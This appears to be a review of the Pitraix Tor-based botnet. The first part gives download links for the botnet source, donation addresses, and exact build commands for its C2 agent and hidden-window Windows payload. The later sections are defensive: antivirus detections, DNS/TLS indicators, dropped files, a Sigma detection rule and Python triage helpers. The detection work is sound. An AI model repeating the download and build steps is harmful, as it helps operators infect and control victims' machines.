
Review Pitraix Botnet: Botnet Over TOR Network

Installation

Github:
https://github.com/ThrillQuks/Pitraix [Banned by Github]
https://github.com/sinister66666/Pitraix [Banned by Github]
https://github.com/thezedwards/Pitraix [Still Alive]

Mirror:
https://anonfiles.com/V8jfY473y0/Pitraix-main_2_zip


If you find this project useful you can donate to the respective developer.


Monero: 85HjZpxZngajAEy2123NuXgu1PnNyq2DLSkkr93cyT8QQVae1GruhL4hHAtnaFqeCF7Vo9eW2P11Sig8DDqzVzCSE95NaW6

Bitcoin (segwit): bc1q2dqk9u06vv2j5p6yptj9ex7epfv77sxjygnrnw

git clone https://github.com/thezedwards/Pitraix
cd Pitraix/pitraix
go mod init pitraix

Build Agent

go build OPER.go

This produces a binary named OPER, the Agent (C2 side) of the Pitraix botnet. On first execution it installs Tor and creates a Tor onion service address, which is the channel the bots use to reach it.

./OPER

Build Payload

Windows:

64Bit:

GOOS=windows go build -ldflags="-s -w -H=windowsgui" lyst_windows.go

32Bit:

GOOS=windows GOARCH=386 go build -ldflags="-s -w -H=windowsgui" -o lyst_windows32.exe lyst_windows.go

This produces lyst_windows.exe (lyst_windows32.exe for the 32-bit build), the payload that establishes the connection between the target and the Agent.

Linux:

Usage

The payload is executed on the target machine. It installs Tor and sets up persistence, so that the target connects over the Tor network to the Agent, which acts as the botnet C2. The Pitraix help command output is shown below (image in the original post, not reproduced here).

Review

Windows Defender flags the payload as malware (Virus:Win32/Wacatac.B!ml):

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Virus:Win32/Wacatac.B!ml&ThreatID=2147774417

On VirusTotal the sample is detected by 17 of 70 antivirus vendors:

https://www.virustotal.com/gui/file/3d9ca72513de1c88b21aa69e5bdfde39bc64aba8818e62b4a945f07fba05178e/detection

Screenshots from the original post (images not reproduced): when the file is executed, Task Manager, Pitraix C2 detection, spawn shell, shell execution, target PC.

Network Communication

DNS Resolutions

When the file under analysis is executed, it performs the following domain name resolutions. dist.torproject.org is the Tor Project's download host, consistent with the payload fetching the Tor bundle at run time; apps.identrust.com (IdenTrust certificate-chain fetches) and ipinfo.io (external IP lookup) are also seen on clean hosts and are weak indicators on their own.

apps.identrust.com

  • 23.55.168.144
  • 23.55.168.155

dist.torproject.org

  • 116.202.120.166
  • 38.229.82.35
  • 116.202.120.165
  • 38.229.82.25

ipinfo.io

  • 34.117.59.81

TLS

www.355mg7d4j3do64vidvrmvpy2j.com
Data:
Version: TLS 1.2
Serial Number: 4b57f55ecc1d0a39
Thumbprint: 6a7f37bd7f87f0e54c6d8db9bf760a662368056e
JA3: 140e0f0cad708278ade0984528fe8493
JA3S: 0debd3853f330c574b05e0b6d882dc27
SNI: www.355mg7d4j3do64vidvrmvpy2j.com
Signature Algorithm:
Issuer: CN=www.nzla5b4t6ctmoz7s.com
Subject: CN=www.nzla5b4t6ctmoz7s.com
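The resolutions and the TLS handshake above are the two network artefacts a defender can key on: a fetch from dist.torproject.org (the payload downloading the Tor bundle) followed by a TLS session whose certificate is self-signed, carries a random www.<random>.com CN in both issuer and subject, and whose SNI does not match that CN, which is how Tor's link-layer TLS looks on the wire. The following Python triage helper is an added example, not code from the original post or from the Pitraix project. It scores constructed DNS log lines and TLS metadata records; the first TLS record reuses the values from the sandbox report above, everything else (the log format, the weights, the CN length bounds, the host names ws01/ws02) is an assumption.

```python
"""Added example: score DNS and TLS metadata for a Pitraix-style Tor bootstrap.
Not code from the original post or the Pitraix project; sample data is constructed."""
import re
from dataclasses import dataclass

# Tor link certificates use a random CN of the form www.<random>.com/.net
# (lowercase letters and digits) and are not chained to any public CA.
# Assumption: the 8-20 length bounds are a heuristic, not a Tor guarantee.
TOR_STYLE_CN = re.compile(r"^CN=www\.[a-z0-9]{8,20}\.(com|net)$")

# Domains the dropped payload resolved while bootstrapping tor (from the
# sandbox DNS list on this page), with a weight. dist.torproject.org is the
# strong signal; the other two are common on clean hosts and score low.
DNS_WATCHLIST = {
    "dist.torproject.org": ("tor bundle download", 3),
    "apps.identrust.com": ("IdenTrust chain fetch, weak", 1),
    "ipinfo.io": ("external IP lookup, weak", 1),
}


@dataclass
class TlsRecord:
    sni: str
    issuer: str
    subject: str
    ja3: str = ""


def parse_dns_line(line):
    # Constructed log format (assumption): "<timestamp> <host> <qname> <answer-ip>"
    parts = line.split()
    if len(parts) != 4:
        return None
    return {"ts": parts[0], "host": parts[1],
            "qname": parts[2].lower().rstrip("."), "answer": parts[3]}


def dns_scores(lines):
    """Sum watch-list weights per source host."""
    scores = {}
    for line in lines:
        rec = parse_dns_line(line)
        if rec and rec["qname"] in DNS_WATCHLIST:
            _, weight = DNS_WATCHLIST[rec["qname"]]
            scores[rec["host"]] = scores.get(rec["host"], 0) + weight
    return scores


def tls_reasons(rec):
    """List the Tor-like properties of one TLS handshake record."""
    reasons = []
    if rec.issuer == rec.subject:
        reasons.append("self-signed certificate")
    if TOR_STYLE_CN.match(rec.subject):
        reasons.append("Tor-style random CN in subject")
    if TOR_STYLE_CN.match(rec.issuer):
        reasons.append("Tor-style random CN in issuer")
    cn = rec.subject[3:] if rec.subject.startswith("CN=") else rec.subject
    if rec.sni and rec.sni != cn:
        reasons.append("SNI does not match certificate CN")
    return reasons


def is_tor_like(rec):
    # Require the random-CN signal plus at least one corroborating signal, so
    # an ordinary self-signed lab certificate on its own is not flagged.
    reasons = tls_reasons(rec)
    return "Tor-style random CN in subject" in reasons and len(reasons) >= 2


def triage(dns_lines, tls_records, threshold=3):
    """Hosts whose DNS score reaches the threshold, plus the number of
    Tor-like TLS handshakes seen in the same capture."""
    scores = dns_scores(dns_lines)
    flagged = sorted(h for h, s in scores.items() if s >= threshold)
    tor_tls = sum(1 for r in tls_records if is_tor_like(r))
    return {"flagged_hosts": flagged, "tor_tls_handshakes": tor_tls,
            "verdict": "likely tor bootstrap" if flagged and tor_tls else "inconclusive"}


# Constructed sample input. The first TLS record copies the values from the
# sandbox report above; the DNS lines and the other TLS records are made up.
SAMPLE_DNS = [
    "2024-05-01T09:00:01Z ws01 dist.torproject.org 116.202.120.166",
    "2024-05-01T09:00:02Z ws01 apps.identrust.com 23.55.168.144",
    "2024-05-01T09:00:05Z ws01 ipinfo.io 34.117.59.81",
    "2024-05-01T09:00:07Z ws02 apps.identrust.com 23.55.168.155",
    "2024-05-01T09:00:09Z ws02 www.example.com 203.0.113.10",
]
SAMPLE_TLS = [
    TlsRecord(sni="www.355mg7d4j3do64vidvrmvpy2j.com",
              issuer="CN=www.nzla5b4t6ctmoz7s.com",
              subject="CN=www.nzla5b4t6ctmoz7s.com",
              ja3="140e0f0cad708278ade0984528fe8493"),
    TlsRecord(sni="www.example.com", issuer="CN=R3,O=Let's Encrypt,C=US",
              subject="CN=www.example.com"),
    TlsRecord(sni="", issuer="CN=lab-ca", subject="CN=lab-ca"),
]

if __name__ == "__main__":
    print(triage(SAMPLE_DNS, SAMPLE_TLS))
```

The DNS score alone is not a verdict: a developer downloading Tor Browser produces the same dist.torproject.org lookup. The combination with a Tor-style handshake from the same capture is what makes the Pitraix case stand out, and JA3/JA3S values such as the ones above can be added as a further exact-match signal once they are confirmed against known Tor client builds.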

Files Dropped

C:\Users\user\AppData\Roaming\tor\cached-certs (copy)
C:\Users\user\AppData\Roaming\tor\cached-certs.tmp
C:\Users\user\AppData\Roaming\tor\cached-microdesc-consensus (copy)
C:\Users\user\AppData\Roaming\tor\cached-microdesc-consensus.tmp
C:\Users\user\AppData\Roaming\tor\cached-microdescs.new
C:\Users\user\AppData\Roaming\tor\state (copy)
C:\Users\user\AppData\Roaming\tor\state.tmp
C:\Users\user\AppData\Roaming\tor\unverified-microdesc-consensus (copy)
C:\Users\user\AppData\Roaming\tor\unverified-microdesc-consensus.tmp
C:\Windows\Logs\ohsDDO3Nfd1EH3UQD8sVQ1CuM
C:\Windows\security\Olwu9ixeIuV2QdazMcb.zip
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Data\Tor\geoip
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Data\Tor\geoip6
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Olwu9ixeIuV2QdazMcbhid\hostname (copy)
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Olwu9ixeIuV2QdazMcbhid\hostname.tmp
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Olwu9ixeIuV2QdazMcbtorrc
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libcrypto-1_1-x64.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libevent-2-1-7.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libevent_core-2-1-7.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libevent_extra-2-1-7.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libgcc_s_seh-1.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libssl-1_1-x64.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libssp-0.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libwinpthread-1.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\tor-gencert.exe
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\tor.exe
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\zlib1.dll
\Device\Null

PREVENTION

With the default Pitraix configuration the dropped Tor binary keeps its original name, so it can be caught with a process-creation detection rule, or blocked with an application-control rule, keyed on the filename tor.exe. The Sigma rule below does exactly that. Two caveats: it also fires for legitimate Tor Browser users, and it is evaded by simply renaming the binary, so pair it with the locations from the Files Dropped list above (C:\Windows\security\<random>\Tor\ and %APPDATA%\tor), which do not depend on the file name.

title: Tor Client or Tor Browser Use
id: 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c
status: experimental
description: Detects the use of Tor or Tor-Browser to connect to onion routing networks
references:
    - https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/
author: frack113
date: 2022/02/20
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: 
            - '\tor.exe'
            - '\Tor Browser\Browser\firefox.exe'
    condition: selection
falsepositives:
    - Unknown
level: high
tags:
    - attack.command_and_control
    - attack.t1090.003
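To see what the rule above does and does not catch, the following Python snippet is an added example (not from the original post, the Sigma project or Pitraix). It applies the rule's selection to constructed Sysmon-style process-creation events and adds a second check keyed on the directories from the Files Dropped list. The command lines, the renamed-binary event and the bounds of the random-directory regex are assumptions.

```python
"""Added example: evaluate the Sigma selection and a path-based check against
constructed process-creation events. Not code from the post, Sigma or Pitraix."""
import re

# Sigma selection from the rule above: Image|endswith. Sigma string matching
# is case-insensitive by default, so both sides are lower-cased.
SIGMA_IMAGE_ENDSWITH = ("\\tor.exe", "\\Tor Browser\\Browser\\firefox.exe")

# Location-based indicators taken from the "Files Dropped" list: the tor
# bundle lands in C:\Windows\security\<random>\Tor\ and the tor data
# directory in %APPDATA%\tor. Assumption: the random directory name is
# alphanumeric; the 8-40 length bounds are a guess, widen them if needed.
DROP_DIR = re.compile(r"^C:\\Windows\\security\\[A-Za-z0-9]{8,40}\\Tor\\", re.IGNORECASE)
APPDATA_TOR = re.compile(r"\\AppData\\Roaming\\tor(\\|$)", re.IGNORECASE)


def sigma_selection(event):
    """True when the event satisfies the Sigma rule's selection."""
    image = event.get("Image", "").lower()
    return any(image.endswith(s.lower()) for s in SIGMA_IMAGE_ENDSWITH)


def pitraix_location(event):
    """True when the process runs from, or points its data directory at, the
    directories the Pitraix payload creates; independent of the file name."""
    image = event.get("Image", "")
    cmdline = event.get("CommandLine", "")
    return bool(DROP_DIR.match(image) or APPDATA_TOR.search(cmdline))


def classify(event):
    s, p = sigma_selection(event), pitraix_location(event)
    if s and p:
        return "both"
    if s:
        return "sigma-only"
    if p:
        return "path-only"
    return "none"


def evaluate(events):
    return [classify(e) for e in events]


# Constructed Sysmon-style process-creation events (Event ID 1 field names).
# Only the Image path of event 0 comes from the dropped-file list; the command
# lines and the renamed-binary case are assumptions for illustration.
EVENTS = [
    {   # what the unmodified Pitraix payload produces
        "Image": r"C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\tor.exe",
        "CommandLine": r'"C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\tor.exe" '
                       r"-f C:\Windows\security\Olwu9ixeIuV2QdazMcb\Olwu9ixeIuV2QdazMcbtorrc",
    },
    {   # hypothetical: operator renamed tor.exe to evade the filename rule
        "Image": r"C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\svchost.exe",
        "CommandLine": r'"C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\svchost.exe" '
                       r"--DataDirectory C:\Users\user\AppData\Roaming\tor",
    },
    {   # legitimate Tor Browser user: the Sigma rule fires, the path check does not
        "Image": r"C:\Users\user\Desktop\Tor Browser\Browser\firefox.exe",
        "CommandLine": r'"C:\Users\user\Desktop\Tor Browser\Browser\firefox.exe"',
    },
    {   # ordinary browser, no signal
        "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"',
    },
]

if __name__ == "__main__":
    for event, verdict in zip(EVENTS, evaluate(EVENTS)):
        print(f"{verdict:10s} {event['Image']}")
```

The second and third events are the point: the filename rule misses a renamed tor.exe and fires on a real Tor Browser user, while the path check does the opposite. Neither should be an automatic block on its own; the combination, plus the network indicators from the previous section, gives a much better signal than blocking on the string tor.exe.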